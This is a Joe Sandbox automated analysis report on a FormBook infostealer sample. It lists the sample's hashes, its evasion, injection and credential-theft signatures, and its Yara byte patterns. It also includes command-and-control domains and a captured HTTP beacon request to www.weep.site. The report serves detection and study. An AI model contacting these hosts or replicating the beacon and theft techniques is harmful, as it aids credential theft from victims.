Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ STR-160-01.exe

Overview

General Information

Sample name:RFQ STR-160-01.exe
Analysis ID:1502761
MD5:33b97929531dcc9308fce497cd75ed3b
SHA1:a6adc359e420476701e5d97ae872436bfa730710
SHA256:4f6d14b81ef333607075b46913e6cb434d5003f37f2a1f372e0328b44af5e76e
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RFQ STR-160-01.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\RFQ STR-160-01.exe" MD5: 33B97929531DCC9308FCE497CD75ED3B)
    • svchost.exe (PID: 2792 cmdline: "C:\Users\user\Desktop\RFQ STR-160-01.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • MVaAnXtfZfwmI.exe (PID: 2580 cmdline: "C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 4232 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • firefox.exe (PID: 6292 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x58bea:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x40f69:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe" , ParentImage: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe, ParentProcessId: 2580, ParentProcessName: MVaAnXtfZfwmI.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 4232, ProcessName: rasdial.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ STR-160-01.exe", CommandLine: "C:\Users\user\Desktop\RFQ STR-160-01.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ STR-160-01.exe", ParentImage: C:\Users\user\Desktop\RFQ STR-160-01.exe, ParentProcessId: 6212, ParentProcessName: RFQ STR-160-01.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ STR-160-01.exe", ProcessId: 2792, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ STR-160-01.exe", CommandLine: "C:\Users\user\Desktop\RFQ STR-160-01.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ STR-160-01.exe", ParentImage: C:\Users\user\Desktop\RFQ STR-160-01.exe, ParentProcessId: 6212, ParentProcessName: RFQ STR-160-01.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ STR-160-01.exe", ProcessId: 2792, ProcessName: svchost.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: RFQ STR-160-01.exeReversingLabs: Detection: 31%
            Source: RFQ STR-160-01.exeVirustotal: Detection: 29%Perma Link
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3995129739.0000000004D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490106320.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3994994966.0000000003430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490739625.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3995137235.0000000004360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: RFQ STR-160-01.exeJoe Sandbox ML: detected
            Source: RFQ STR-160-01.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MVaAnXtfZfwmI.exe, 00000006.00000000.2410689421.0000000000CDE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ STR-160-01.exe, 00000000.00000003.2139890971.0000000004130000.00000004.00001000.00020000.00000000.sdmp, RFQ STR-160-01.exe, 00000000.00000003.2140381370.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396171079.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393966388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490426907.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490426907.0000000003900000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2492881265.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996178534.000000000514E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996178534.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2490543910.0000000004C44000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000003.2457687676.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490320517.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MVaAnXtfZfwmI.exe, 00000006.00000003.2433859570.0000000000804000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ STR-160-01.exe, 00000000.00000003.2139890971.0000000004130000.00000004.00001000.00020000.00000000.sdmp, RFQ STR-160-01.exe, 00000000.00000003.2140381370.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2396171079.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393966388.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490426907.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490426907.0000000003900000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000007.00000003.2492881265.0000000004DFD000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996178534.000000000514E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996178534.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000007.00000003.2490543910.0000000004C44000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000003.2457687676.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490320517.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MVaAnXtfZfwmI.exe, 00000006.00000003.2433859570.0000000000804000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000054EC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3990288886.0000000003329000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2773015874.000000000EBFC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000054EC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000055DC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3990288886.0000000003329000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2773015874.000000000EBFC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_005FDBBE
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005CC2A2 FindFirstFileExW,0_2_005CC2A2
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_006068EE FindFirstFileW,FindClose,0_2_006068EE
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0060698F
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005FD076
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_005FD3A9
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00609642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00609642
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0060979D
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00609B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00609B2B
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00605C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00605C97
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_0307C420 FindFirstFileW,FindNextFileW,FindClose,7_2_0307C420
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 4x nop then pop edi6_2_07951567
            Source: C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exeCode function: 4x nop then xor eax, eax6_2_07956A0A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then xor eax, eax7_2_03069B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then pop edi7_2_0306E109
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 4x nop then mov ebx, 00000004h7_2_04E304DF

            Networking

            barindex
            Source: DNS query: www.jaxo.xyz
            Source: Joe Sandbox ViewIP Address: 176.57.64.102 176.57.64.102
            Source: Joe Sandbox ViewIP Address: 167.172.133.32 167.172.133.32
            Source: Joe Sandbox ViewIP Address: 18.183.3.45 18.183.3.45
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0060CE44
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Sep 2024 07:09:20 GMTserver: Apacheset-cookie: __tad=1725260960.6248686; expires=Thu, 31-Aug-2034 07:09:20 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Sep 2024 07:09:23 GMTserver: Apacheset-cookie: __tad=1725260963.7901334; expires=Thu, 31-Aug-2034 07:09:23 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Sep 2024 07:09:25 GMTserver: Apacheset-cookie: __tad=1725260965.7634523; expires=Thu, 31-Aug-2034 07:09:25 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: GET /v1m8/?cLqL3H=MbosJJuAq5eUJ0hPiGjwIN1TLoIAcga9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjssfFBuX2F/io1ZFH4zFtNPAFxgqhGgKh1aBi0mxPguqsni1l53c=&rZwP=sHyxifGPIFN HTTP/1.1Host: www.weep.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
